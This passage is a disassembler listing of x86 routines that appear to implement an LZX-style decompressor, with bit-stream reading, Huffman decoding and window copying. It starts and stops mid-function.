mov ebx, [esp+8+arg_4]
push ebp
mov ebp, [esp+0Ch+arg_0]
push esi
push edi
xor edi, edi
xor esi, esi
cmp ebx, edi
mov [esp+14h+var_4], esi
jle loc_10049E7
loc_1004814: ; CODE XREF: sub_10047F7:loc_10049DD�j
cmp dword ptr [ebp+2EDCh], 1
jnz loc_10049B7
lea eax, [ebp+2EB8h]
cmp [eax], edi
jz short loc_100485E
push 1
push ebp
mov [eax], edi
call sub_1004B04
test eax, eax
jz short loc_1004858
push 10h
push ebp
call sub_1004B04
push 10h
push ebp
mov esi, eax
call sub_1004B04
shl esi, 10h
or eax, esi
mov [ebp+2EC4h], eax
jmp short loc_100485E
; ---------------------------------------------------------------------------
loc_1004858: ; CODE XREF: sub_10047F7+40�j
mov [ebp+2EC4h], edi
loc_100485E: ; CODE XREF: sub_10047F7+32�j
; sub_10047F7+5F�j
cmp dword ptr [ebp+2ED8h], 3
jnz short loc_100488F
test byte ptr [ebp+2ED0h], 1
jz short loc_1004883
lea eax, [ebp+2B04h]
mov ecx, [eax]
cmp ecx, [ebp+2B08h]
jnb short loc_1004883
inc ecx
mov [eax], ecx
loc_1004883: ; CODE XREF: sub_10047F7+77�j
; sub_10047F7+87�j
push ebp
mov [ebp+2ED8h], edi
call sub_1004A0B
loc_100488F: ; CODE XREF: sub_10047F7+6E�j
push 3
push ebp
call sub_1004B04
push 8
push ebp
mov [ebp+2ED8h], eax
call sub_1004B04
push 8
push ebp
mov esi, eax
call sub_1004B04
push 8
push ebp
mov edi, eax
call sub_1004B04
shl esi, 8
add esi, edi
shl esi, 8
add eax, esi
cmp dword ptr [ebp+2ED8h], 2
mov [ebp+2ED0h], eax
mov [ebp+2ED4h], eax
jnz short loc_10048DE
push ebp
call sub_1005A2F
loc_10048DE: ; CODE XREF: sub_10047F7+DF�j
mov eax, [ebp+2ED8h]
cmp eax, 1
jz short loc_1004905
cmp eax, 2
jz short loc_1004905
cmp eax, 3
jnz short loc_10048FD
push ebp
call sub_1004BA6
test eax, eax
jnz short loc_1004945
loc_10048FD: ; CODE XREF: sub_10047F7+FA�j
; sub_10047F7+16E�j ...
or eax, 0FFFFFFFFh
jmp loc_1004A03
; ---------------------------------------------------------------------------
loc_1004905: ; CODE XREF: sub_10047F7+F0�j
; sub_10047F7+F5�j
movzx ecx, byte ptr [ebp+2EB5h]
lea ecx, ds:100h[ecx*8]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+0A18h]
lea edi, [ebp+2B14h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 3Eh
pop ecx
lea esi, [ebp+0CB8h]
lea edi, [ebp+2DB4h]
rep movsd
push ebp
movsb
call sub_1005978
loc_1004945: ; CODE XREF: sub_10047F7+104�j
mov dword ptr [ebp+2EDCh], 2
xor edi, edi
jmp short loc_10049B7
; ---------------------------------------------------------------------------
loc_1004953: ; CODE XREF: sub_10047F7+1C6�j
cmp ebx, edi
jle short loc_10049BF
mov esi, [ebp+2ED4h]
cmp esi, ebx
jl short loc_1004963
mov esi, ebx
loc_1004963: ; CODE XREF: sub_10047F7+168�j
cmp esi, edi
jz short loc_10048FD
mov ecx, [ebp+2ED8h]
cmp ecx, 2
mov eax, [ebp+2EC0h]
jnz short loc_1004982
push esi
push eax
push ebp
call sub_10056D5
jmp short loc_10049A3
; ---------------------------------------------------------------------------
loc_1004982: ; CODE XREF: sub_10047F7+17F�j
cmp ecx, 1
jnz short loc_1004991
push esi
push eax
push ebp
call sub_100509F
jmp short loc_10049A3
; ---------------------------------------------------------------------------
loc_1004991: ; CODE XREF: sub_10047F7+18E�j
cmp ecx, 3
jnz short loc_10049A0
push esi
push eax
push ebp
call sub_1004B28
jmp short loc_10049A3
; ---------------------------------------------------------------------------
loc_10049A0: ; CODE XREF: sub_10047F7+19D�j
or eax, 0FFFFFFFFh
loc_10049A3: ; CODE XREF: sub_10047F7+189�j
; sub_10047F7+198�j ...
cmp eax, edi
jnz loc_10048FD
sub [ebp+2ED4h], esi
sub ebx, esi
add [esp+14h+var_4], esi
loc_10049B7: ; CODE XREF: sub_10047F7+24�j
; sub_10047F7+15A�j
cmp [ebp+2ED4h], edi
jg short loc_1004953
loc_10049BF: ; CODE XREF: sub_10047F7+15E�j
cmp [ebp+2ED4h], edi
jnz short loc_10049D1
mov dword ptr [ebp+2EDCh], 1
loc_10049D1: ; CODE XREF: sub_10047F7+1CE�j
cmp ebx, edi
jnz short loc_10049DD
push ebp
call sub_1004A0B
cmp ebx, edi
loc_10049DD: ; CODE XREF: sub_10047F7+1DC�j
jg loc_1004814
mov esi, [esp+14h+var_4]
loc_10049E7: ; CODE XREF: sub_10047F7+17�j
mov eax, [ebp+2EC0h]
cmp eax, edi
jnz short loc_10049F4
mov eax, [ebp+4]
loc_10049F4: ; CODE XREF: sub_10047F7+1F8�j
sub eax, esi
add eax, [ebp+0]
push eax
push esi
push ebp
call sub_1005720
mov eax, esi
loc_1004A03: ; CODE XREF: sub_10047F7+109�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
sub_10047F7 endp
; =============== S U B R O U T I N E =======================================
sub_1004A0B proc near ; CODE XREF: sub_10047F7+93�p
; sub_10047F7+1DF�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+2ED8h], 3
jz short locret_1004A59
mov eax, [ecx+2B04h]
push esi
lea esi, [eax+4]
cmp esi, [ecx+2B08h]
ja short loc_1004A58
xor edx, edx
mov dh, [eax+1]
push edi
movzx edi, byte ptr [eax+3]
mov dl, [eax]
movzx eax, byte ptr [eax+2]
mov byte ptr [ecx+2EB4h], 10h
mov [ecx+2B04h], esi
shl edx, 8
or edx, edi
shl edx, 8
or edx, eax
mov [ecx+2EB0h], edx
pop edi
loc_1004A58: ; CODE XREF: sub_1004A0B+1D�j
pop esi
locret_1004A59: ; CODE XREF: sub_1004A0B+B�j
retn 4
sub_1004A0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1004A5C proc near ; CODE XREF: sub_100454A+27�p
jmp sub_1004A0B
sub_1004A5C endp
; =============== S U B R O U T I N E =======================================
sub_1004A61 proc near ; CODE XREF: sub_1004B04+19�p
; sub_100576D+AC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub [eax+2EB4h], cl
shl dword ptr [eax+2EB0h], cl
mov dl, [eax+2EB4h]
test dl, dl
push edi
mov edi, [eax+2EB0h]
jg short loc_1004B00
push ebx
push esi
mov esi, [eax+2B04h]
cmp esi, [eax+2B08h]
jb short loc_1004AA2
loc_1004A96: ; CODE XREF: sub_1004A61+74�j
mov dword ptr [eax+2EBCh], 1
jmp short loc_1004AFE
; ---------------------------------------------------------------------------
loc_1004AA2: ; CODE XREF: sub_1004A61+33�j
xor ebx, ebx
mov bh, [esi+1]
xor ecx, ecx
mov cl, dl
add dl, 10h
mov bl, [esi]
add esi, 2
neg ecx
mov [eax+2B04h], esi
mov [eax+2EB4h], dl
shl ebx, cl
or ebx, edi
test dl, dl
mov [eax+2EB0h], ebx
jg short loc_1004AFE
cmp esi, [eax+2B08h]
jnb short loc_1004A96
xor ebx, ebx
mov bh, [esi+1]
xor ecx, ecx
mov cl, dl
mov bl, [esi]
add esi, 2
neg ecx
mov [eax+2B04h], esi
shl ebx, cl
or [eax+2EB0h], ebx
add dl, 10h
mov [eax+2EB4h], dl
loc_1004AFE: ; CODE XREF: sub_1004A61+3F�j
; sub_1004A61+6C�j
pop esi
pop ebx
loc_1004B00: ; CODE XREF: sub_1004A61+23�j
pop edi
retn 8
sub_1004A61 endp
; =============== S U B R O U T I N E =======================================
sub_1004B04 proc near ; CODE XREF: sub_10047F7+39�p
; sub_10047F7+45�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, [eax+2EB0h]
push 20h
pop ecx
push [esp+4+arg_4]
sub ecx, [esp+8+arg_4]
push eax
shr esi, cl
call sub_1004A61
mov eax, esi
pop esi
retn 8
sub_1004B04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004B28 proc near ; CODE XREF: sub_10047F7+1A2�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov edx, [ecx+2B04h]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
lea edi, [esi+eax]
cmp esi, edi
mov ebx, esi
mov [ebp+arg_4], ebx
jge short loc_1004B61
loc_1004B49: ; CODE XREF: sub_1004B28+34�j
cmp edx, [ecx+2B08h]
jnb short loc_1004B78
mov bl, [edx]
mov eax, [ecx]
mov [esi+eax], bl
inc esi
inc edx
cmp esi, edi
jl short loc_1004B49
mov ebx, [ebp+arg_4]
loc_1004B61: ; CODE XREF: sub_1004B28+1F�j
mov eax, 101h
cmp edi, eax
mov [ecx+2B04h], edx
mov [ebp+arg_4], eax
jg short loc_1004B8B
mov [ebp+arg_4], edi
jmp short loc_1004B8B
; ---------------------------------------------------------------------------
loc_1004B78: ; CODE XREF: sub_1004B28+27�j
or eax, 0FFFFFFFFh
jmp short loc_1004B9F
; ---------------------------------------------------------------------------
loc_1004B7D: ; CODE XREF: sub_1004B28+66�j
mov eax, [ecx]
mov edx, [ecx+4]
add edx, eax
mov al, [eax+ebx]
mov [edx+ebx], al
inc ebx
loc_1004B8B: ; CODE XREF: sub_1004B28+49�j
; sub_1004B28+4E�j
cmp ebx, [ebp+arg_4]
jb short loc_1004B7D
mov eax, [ecx+8]
and eax, esi
mov [ecx+2EC0h], eax
mov eax, esi
sub eax, edi
loc_1004B9F: ; CODE XREF: sub_1004B28+53�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_1004B28 endp
; =============== S U B R O U T I N E =======================================
sub_1004BA6 proc near ; CODE XREF: sub_10047F7+FD�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax+2B04h], 0FFFFFFFEh
mov ecx, [eax+2B04h]
add ecx, 4
cmp ecx, [eax+2B08h]
jb short loc_1004BC6
xor eax, eax
jmp short locret_1004C03
; ---------------------------------------------------------------------------
loc_1004BC6: ; CODE XREF: sub_1004BA6+1A�j
push ebx
push esi
push edi
push 3
lea esi, [eax+0Ch]
pop edi
loc_1004BCF: ; CODE XREF: sub_1004BA6+55�j
mov ecx, [eax+2B04h]
movzx ebx, byte ptr [ecx+1]
xor edx, edx
mov dh, [ecx+3]
mov dl, [ecx+2]
movzx ecx, byte ptr [ecx]
shl edx, 8
or edx, ebx
shl edx, 8
or edx, ecx
mov [esi], edx
add dword ptr [eax+2B04h], 4
add esi, 4
dec edi
jnz short loc_1004BCF
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
locret_1004C03: ; CODE XREF: sub_1004BA6+1E�j
retn 4
sub_1004BA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004C06 proc near ; CODE XREF: sub_100509F+1F�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov al, [edx+2EB4h]
push ebx
mov ebx, [edx+2B08h]
mov [ebp+var_C], ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [edx+2EB0h]
add ebx, ecx
cmp ecx, ebx
push edi
mov edi, [edx+2B04h]
mov [ebp+var_14], ebx
jge loc_1004E3D
loc_1004C3D: ; CODE XREF: sub_1004C06+231�j
mov ecx, esi
shr ecx, 16h
movsx ebx, word ptr [edx+ecx*2+18h]
test ebx, ebx
jge short loc_1004C6E
mov ecx, 200000h
loc_1004C50: ; CODE XREF: sub_1004C06+66�j
neg ebx
test ecx, esi
jz short loc_1004C60
movsx ebx, word ptr [edx+ebx*4+0E3Eh]
jmp short loc_1004C68
; ---------------------------------------------------------------------------
loc_1004C60: ; CODE XREF: sub_1004C06+4E�j
movsx ebx, word ptr [edx+ebx*4+0E3Ch]
loc_1004C68: ; CODE XREF: sub_1004C06+58�j
shr ecx, 1
test ebx, ebx
jl short loc_1004C50
loc_1004C6E: ; CODE XREF: sub_1004C06+43�j
cmp edi, [ebp+var_C]
jnb loc_1004E58
mov cl, [ebx+edx+0A18h]
shl esi, cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
mov [ebp+var_4], esi
jg short loc_1004CAE
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_8], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_8]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
mov byte ptr [ebp+arg_4+3], al
loc_1004CAE: ; CODE XREF: sub_1004C06+84�j
sub ebx, 100h
jns short loc_1004CCC
mov esi, [edx]
mov ecx, [ebp+arg_0]
mov [ecx+esi], bl
mov esi, [edx+4]
add esi, [edx]
mov [esi+ecx], bl
inc ecx
jmp loc_1004E2E
; ---------------------------------------------------------------------------
loc_1004CCC: ; CODE XREF: sub_1004C06+AE�j
mov ecx, ebx
and ecx, 7
cmp ecx, 7
mov [ebp+var_8], ecx
jnz short loc_1004D4F
mov ecx, [ebp+var_4]
mov eax, ecx
shr eax, 18h
movsx esi, word ptr [edx+eax*2+818h]
test esi, esi
mov [ebp+var_8], esi
jge short loc_1004D16
mov eax, 800000h
loc_1004CF5: ; CODE XREF: sub_1004C06+10B�j
neg esi
test eax, ecx
jz short loc_1004D05
movsx esi, word ptr [edx+esi*4+233Eh]
jmp short loc_1004D0D
; ---------------------------------------------------------------------------
loc_1004D05: ; CODE XREF: sub_1004C06+F3�j
movsx esi, word ptr [edx+esi*4+233Ch]
loc_1004D0D: ; CODE XREF: sub_1004C06+FD�j
shr eax, 1
test esi, esi
jl short loc_1004CF5
mov [ebp+var_8], esi
loc_1004D16: ; CODE XREF: sub_1004C06+E8�j
mov cl, [esi+edx+0CB8h]
mov al, byte ptr [ebp+arg_4+3]
shl [ebp+var_4], cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
jg short loc_1004D4B
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_10], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_10]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
loc_1004D4B: ; CODE XREF: sub_1004C06+124�j
add [ebp+var_8], 7
loc_1004D4F: ; CODE XREF: sub_1004C06+D1�j
sar ebx, 3
cmp bl, 2
jle short loc_1004DD2
cmp bl, 3
jle short loc_1004DC1
mov esi, [ebp+var_4]
movsx ecx, bl
movzx ebx, ds:byte_1001278[ecx]
mov [ebp+arg_4], ecx
push 20h
pop ecx
sub ecx, ebx
shr esi, cl
mov ecx, ebx
shl [ebp+var_4], cl
mov ecx, [ebp+arg_4]
sub al, ds:byte_1001278[ecx]
test al, al
jg short loc_1004DB5
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
add al, 10h
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
test al, al
jg short loc_1004DB5
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
loc_1004DB5: ; CODE XREF: sub_1004C06+17D�j
; sub_1004C06+197�j
mov ecx, [ebp+arg_4]
add esi, ds:dword_10012B0[ecx*4]
jmp short loc_1004DC4
; ---------------------------------------------------------------------------
loc_1004DC1: ; CODE XREF: sub_1004C06+154�j
xor esi, esi
inc esi
loc_1004DC4: ; CODE XREF: sub_1004C06+1B9�j
mov ecx, [edx+10h]
mov [edx+14h], ecx
mov ecx, [edx+0Ch]
mov [edx+10h], ecx
jmp short loc_1004DE4
; ---------------------------------------------------------------------------
loc_1004DD2: ; CODE XREF: sub_1004C06+14F�j
test bl, bl
movsx ecx, bl
lea ecx, [edx+ecx*4+0Ch]
mov esi, [ecx]
jz short loc_1004DE7
mov ebx, [edx+0Ch]
mov [ecx], ebx
loc_1004DE4: ; CODE XREF: sub_1004C06+1CA�j
mov [edx+0Ch], esi
loc_1004DE7: ; CODE XREF: sub_1004C06+1D7�j
mov ecx, [ebp+arg_0]
add [ebp+var_8], 2
mov ebx, ecx
sub ebx, esi
mov [ebp+arg_0], ebx
loc_1004DF5: ; CODE XREF: sub_1004C06+226�j
mov ebx, [edx+8]
mov esi, [edx]
and ebx, [ebp+arg_0]
cmp ecx, 101h
mov bl, [ebx+esi]
mov [ebp+arg_4], esi
mov [esi+ecx], bl
jge short loc_1004E21
mov esi, [edx]
mov ebx, [edx+4]
mov [ebp+arg_4], eax
mov al, [esi+ecx]
add ebx, esi
mov [ebx+ecx], al
mov eax, [ebp+arg_4]
loc_1004E21: ; CODE XREF: sub_1004C06+206�j
inc ecx
inc [ebp+arg_0]
dec [ebp+var_8]
cmp [ebp+var_8], 0
jg short loc_1004DF5
loc_1004E2E: ; CODE XREF: sub_1004C06+C1�j
cmp ecx, [ebp+var_14]
mov esi, [ebp+var_4]
mov [ebp+arg_0], ecx
jl loc_1004C3D
loc_1004E3D: ; CODE XREF: sub_1004C06+31�j
mov [edx+2EB4h], al
mov [edx+2EB0h], esi
mov [edx+2B04h], edi
mov eax, ecx
loc_1004E51: ; CODE XREF: sub_1004C06+255�j
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
loc_1004E58: ; CODE XREF: sub_1004C06+6B�j
or eax, 0FFFFFFFFh
jmp short loc_1004E51
sub_1004C06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004E5D proc near ; CODE XREF: sub_100509F+41�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov edx, [ebp+arg_0]
mov al, [edx+2EB4h]
mov ecx, [ebp+arg_8]
mov byte ptr [ebp+arg_0+3], al
mov eax, [edx+2B08h]
push ebx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
push esi
mov esi, [edx+2B04h]
add ecx, eax
cmp eax, ecx
push edi
mov edi, [edx+2EB0h]
mov [ebp+var_8], ecx
jge loc_1005070
loc_1004E9A: ; CODE XREF: sub_1004E5D+20D�j
mov eax, edi
shr eax, 16h
movsx ebx, word ptr [edx+eax*2+18h]
test ebx, ebx
jge short loc_1004ECB
mov eax, 200000h
loc_1004EAD: ; CODE XREF: sub_1004E5D+6C�j
neg ebx
test eax, edi
jz short loc_1004EBD
movsx ebx, word ptr [edx+ebx*4+0E3Eh]
jmp short loc_1004EC5
; ---------------------------------------------------------------------------
loc_1004EBD: ; CODE XREF: sub_1004E5D+54�j
movsx ebx, word ptr [edx+ebx*4+0E3Ch]
loc_1004EC5: ; CODE XREF: sub_1004E5D+5E�j
shr eax, 1
test ebx, ebx
jl short loc_1004EAD
loc_1004ECB: ; CODE XREF: sub_1004E5D+49�j
cmp esi, [ebp+var_C]
jnb loc_100509A
mov cl, [ebx+edx+0A18h]
shl edi, cl
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
sub cl, [ebx+edx+0A18h]
mov [ebp+arg_8], edi
test cl, cl
mov byte ptr [ebp+arg_0+3], cl
jg short loc_1004F07
xor eax, eax
mov ah, [esi+1]
neg ecx
mov al, [esi]
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
add byte ptr [ebp+arg_0+3], 10h
loc_1004F07: ; CODE XREF: sub_1004E5D+94�j
sub ebx, 100h
jns short loc_1004F1D
mov eax, [ebp+arg_4]
mov ecx, [edx]
mov [eax+ecx], bl
inc eax
jmp loc_1005061
; ---------------------------------------------------------------------------
loc_1004F1D: ; CODE XREF: sub_1004E5D+B0�j
mov eax, ebx
and eax, 7
cmp eax, 7
mov [ebp+var_4], eax
jnz short loc_1004F9D
mov eax, [ebp+arg_8]
shr eax, 18h
movsx edi, word ptr [edx+eax*2+818h]
test edi, edi
mov [ebp+var_4], edi
jge short loc_1004F68
mov eax, 800000h
loc_1004F44: ; CODE XREF: sub_1004E5D+106�j
mov ecx, [ebp+arg_8]
neg edi
test eax, ecx
jz short loc_1004F57
movsx edi, word ptr [edx+edi*4+233Eh]
jmp short loc_1004F5F
; ---------------------------------------------------------------------------
loc_1004F57: ; CODE XREF: sub_1004E5D+EE�j
movsx edi, word ptr [edx+edi*4+233Ch]
loc_1004F5F: ; CODE XREF: sub_1004E5D+F8�j
shr eax, 1
test edi, edi
jl short loc_1004F44
mov [ebp+var_4], edi
loc_1004F68: ; CODE XREF: sub_1004E5D+E0�j
mov cl, [edi+edx+0CB8h]
shl [ebp+arg_8], cl
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
sub cl, [edi+edx+0CB8h]
test cl, cl
mov byte ptr [ebp+arg_0+3], cl
jg short loc_1004F99
xor eax, eax
mov ah, [esi+1]
neg ecx
mov al, [esi]
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
add byte ptr [ebp+arg_0+3], 10h
loc_1004F99: ; CODE XREF: sub_1004E5D+126�j
add [ebp+var_4], 7
loc_1004F9D: ; CODE XREF: sub_1004E5D+CB�j
sar ebx, 3
cmp bl, 2
jle loc_100502B
cmp bl, 3
jle short loc_1005017
mov edi, [ebp+arg_8]
movsx ebx, bl
movzx eax, ds:byte_1001278[ebx]
push 20h
pop ecx
sub ecx, eax
shr edi, cl
mov ecx, eax
mov al, ds:byte_1001278[ebx]
sub byte ptr [ebp+arg_0+3], al
shl [ebp+arg_8], cl
cmp byte ptr [ebp+arg_0+3], 0
jg short loc_100500E
xor eax, eax
mov ah, [esi+1]
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
add byte ptr [ebp+arg_0+3], 10h
mov al, [esi]
neg ecx
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
cmp byte ptr [ebp+arg_0+3], 0
jg short loc_100500E
xor eax, eax
mov ah, [esi+1]
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
mov al, [esi]
neg ecx
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
add byte ptr [ebp+arg_0+3], 10h
loc_100500E: ; CODE XREF: sub_1004E5D+177�j
; sub_1004E5D+196�j
add edi, ds:dword_10012B0[ebx*4]
jmp short loc_100501D
; ---------------------------------------------------------------------------
loc_1005017: ; CODE XREF: sub_1004E5D+14F�j
mov edi, ds:dword_10012BC
loc_100501D: ; CODE XREF: sub_1004E5D+1B8�j
mov eax, [edx+10h]
mov [edx+14h], eax
mov eax, [edx+0Ch]
mov [edx+10h], eax
jmp short loc_100503D
; ---------------------------------------------------------------------------
loc_100502B: ; CODE XREF: sub_1004E5D+146�j
test bl, bl
movsx eax, bl
lea eax, [edx+eax*4+0Ch]
mov edi, [eax]
jz short loc_1005040
mov ecx, [edx+0Ch]
mov [eax], ecx
loc_100503D: ; CODE XREF: sub_1004E5D+1CC�j
mov [edx+0Ch], edi
loc_1005040: ; CODE XREF: sub_1004E5D+1D9�j
mov eax, [ebp+arg_4]
add [ebp+var_4], 2
mov ecx, eax
sub ecx, edi
and ecx, [edx+8]
loc_100504E: ; CODE XREF: sub_1004E5D+202�j
mov edi, [edx]
mov bl, [edi+ecx]
mov [edi+eax], bl
inc eax
inc ecx
dec [ebp+var_4]
cmp [ebp+var_4], 0
jg short loc_100504E
loc_1005061: ; CODE XREF: sub_1004E5D+BB�j
cmp eax, [ebp+var_8]
mov edi, [ebp+arg_8]
mov [ebp+arg_4], eax
jl loc_1004E9A
loc_1005070: ; CODE XREF: sub_1004E5D+37�j
mov cl, byte ptr [ebp+arg_0+3]
mov [edx+2EB4h], cl
mov ecx, [edx+8]
and ecx, eax
sub eax, [ebp+var_8]
mov [edx+2EB0h], edi
mov [edx+2B04h], esi
mov [edx+2EC0h], ecx
loc_1005093: ; CODE XREF: sub_1004E5D+240�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_100509A: ; CODE XREF: sub_1004E5D+71�j
or eax, 0FFFFFFFFh
jmp short loc_1005093
sub_1004E5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100509F proc near ; CODE XREF: sub_10047F7+193�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov eax, 101h
cmp esi, eax
jge short loc_10050DB
sub eax, esi
cmp eax, [ebp+arg_8]
jl short loc_10050BC
mov eax, [ebp+arg_8]
loc_10050BC: ; CODE XREF: sub_100509F+18�j
push eax
push esi
call sub_1004C06
sub esi, eax
add [ebp+arg_8], esi
cmp [ebp+arg_8], 0
mov esi, eax
mov [edx+2EC0h], eax
jg short loc_10050DB
mov eax, [ebp+arg_8]
jmp short loc_10050E5
; ---------------------------------------------------------------------------
loc_10050DB: ; CODE XREF: sub_100509F+11�j
; sub_100509F+35�j
push [ebp+arg_8]
push esi
push edx
call sub_1004E5D
loc_10050E5: ; CODE XREF: sub_100509F+3A�j
pop esi
pop ebp
retn 0Ch
sub_100509F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10050EA proc near ; CODE XREF: sub_10056D5+1F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, [ebp+arg_0]
mov al, [edx+2EB4h]
push ebx
mov ebx, [edx+2B08h]
mov [ebp+var_10], ebx
mov ebx, [edx]
mov [ebp+var_C], ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [edx+2EB0h]
add ebx, ecx
cmp ecx, ebx
push edi
mov edi, [edx+2B04h]
mov [ebp+var_18], ebx
jge loc_10053AA
loc_1005126: ; CODE XREF: sub_10050EA+2BA�j
mov ecx, esi
shr ecx, 16h
movsx ebx, word ptr [edx+ecx*2+18h]
test ebx, ebx
jge short loc_1005157
mov ecx, 200000h
loc_1005139: ; CODE XREF: sub_10050EA+6B�j
neg ebx
test ecx, esi
jz short loc_1005149
movsx ebx, word ptr [edx+ebx*4+0E3Eh]
jmp short loc_1005151
; ---------------------------------------------------------------------------
loc_1005149: ; CODE XREF: sub_10050EA+53�j
movsx ebx, word ptr [edx+ebx*4+0E3Ch]
loc_1005151: ; CODE XREF: sub_10050EA+5D�j
shr ecx, 1
test ebx, ebx
jl short loc_1005139
loc_1005157: ; CODE XREF: sub_10050EA+48�j
cmp edi, [ebp+var_10]
jnb loc_10053C5
mov cl, [ebx+edx+0A18h]
shl esi, cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
mov [ebp+var_4], esi
jg short loc_1005197
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_8], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_8]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
mov byte ptr [ebp+arg_4+3], al
loc_1005197: ; CODE XREF: sub_10050EA+89�j
sub ebx, 100h
jns short loc_10051B7
mov ecx, [ebp+arg_0]
mov esi, [ebp+var_C]
mov [esi+ecx], bl
mov esi, [edx+4]
add esi, [ebp+var_C]
mov [esi+ecx], bl
inc ecx
jmp loc_100539B
; ---------------------------------------------------------------------------
loc_10051B7: ; CODE XREF: sub_10050EA+B3�j
mov ecx, ebx
and ecx, 7
cmp ecx, 7
mov [ebp+var_8], ecx
jnz short loc_100523B
mov eax, [ebp+var_4]
shr eax, 18h
movsx esi, word ptr [edx+eax*2+818h]
test esi, esi
mov [ebp+var_8], esi
jge short loc_1005202
mov eax, 800000h
loc_10051DE: ; CODE XREF: sub_10050EA+113�j
mov ecx, [ebp+var_4]
neg esi
test eax, ecx
jz short loc_10051F1
movsx esi, word ptr [edx+esi*4+233Eh]
jmp short loc_10051F9
; ---------------------------------------------------------------------------
loc_10051F1: ; CODE XREF: sub_10050EA+FB�j
movsx esi, word ptr [edx+esi*4+233Ch]
loc_10051F9: ; CODE XREF: sub_10050EA+105�j
shr eax, 1
test esi, esi
jl short loc_10051DE
mov [ebp+var_8], esi
loc_1005202: ; CODE XREF: sub_10050EA+ED�j
mov cl, [esi+edx+0CB8h]
mov al, byte ptr [ebp+arg_4+3]
shl [ebp+var_4], cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
jg short loc_1005237
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_14], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_14]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
loc_1005237: ; CODE XREF: sub_10050EA+12C�j
add [ebp+var_8], 7
loc_100523B: ; CODE XREF: sub_10050EA+D8�j
sar ebx, 3
cmp bl, 2
movsx ecx, bl
jle loc_1005348
mov [ebp+arg_4], ecx
mov cl, ds:byte_1001278[ecx]
cmp cl, 3
jb loc_10052F2
movzx ebx, cl
lea ecx, [ebx-3]
test ecx, ecx
jz short loc_100529F
